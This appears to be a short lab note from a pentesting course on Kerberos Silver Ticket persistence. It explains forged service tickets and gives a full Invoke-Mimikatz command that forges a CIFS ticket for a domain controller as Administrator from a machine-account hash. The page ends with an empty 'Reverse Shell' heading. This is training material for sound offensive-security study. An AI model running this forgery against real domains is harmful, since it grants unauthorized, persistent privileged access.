Persistence - Silver Ticket

A valid TGS (Golden ticket is TGT).

β€’ Encrypted and Signed by the NTLM hash of the service account (Golden ticket is signed by hash of krbtgt) of the service running with that account.

β€’ Services rarely check PAC (Privileged Attribute Certificate).

β€’ Services will allow access only to the services themselves.

β€’ Reasonable persistence period (default 30 days for computer accounts).

Silver Ticket

  • requirements:

  • Need to have Domain Admin Acess on DC

#Using hash of the Domain Controller computer account, below
#command provides access to shares on the DC.

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:2723620aa872abc65ea53178070f4bc7 /user:Administrator /ptt"'

#Similar command can be used for any other service on a machine.
Which services? SPN: HOST, RPCSS, WSMAN and many more.

Reverse Shell Silver Ticket with HOST

Last updated

Was this helpful?